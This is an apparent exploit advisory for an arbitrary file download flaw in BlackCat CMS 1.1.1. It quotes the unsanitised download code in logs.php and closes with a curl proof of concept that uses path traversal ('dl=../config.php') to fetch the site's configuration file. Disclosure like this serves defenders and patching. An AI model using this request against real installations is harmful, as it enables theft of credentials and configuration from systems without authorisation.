BlackCat CMS 1.1.1 Arbitrary File Download

`# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability   
# Date: 2015/06/16  
# Vendor Homepage: http://blackcat-cms.org/  
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip  
# Version: v1.1.1  
# Tested on: Centos 6.5,PHP 5.4.41  
# Category: webapps  
  
* Description  
  
file:/modules/blackcat/widgets/logs.php  
  
72 // download  
73 if(CAT_Helper_Validate::sanitizeGet('dl'))  
74 {  
75 $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl')); <-- Not Taint Checking  
76 if(file_exists($file))  
77 {  
78 $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');  
79 $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))  
80 ->create(array($file));  
81 if(!$zip->errorCode() == 0)  
82 {  
83 echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")  
84 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );  
85 }  
86 else  
87 {  
88 $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';  
89 header("Pragma: public"); // required  
90 header("Expires: 0");  
91 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");  
92 header("Cache-Control: private",false); // required for certain browsers  
93 header("Content-Type: application/zip");  
94 header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );  
95 header("Content-Transfer-Encoding: binary");  
96 header("Content-Length: ".filesize($filename));  
97 readfile("$filename");  
98 exit;  
99 }  
100 }  
  
  
POC:  
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip -   
`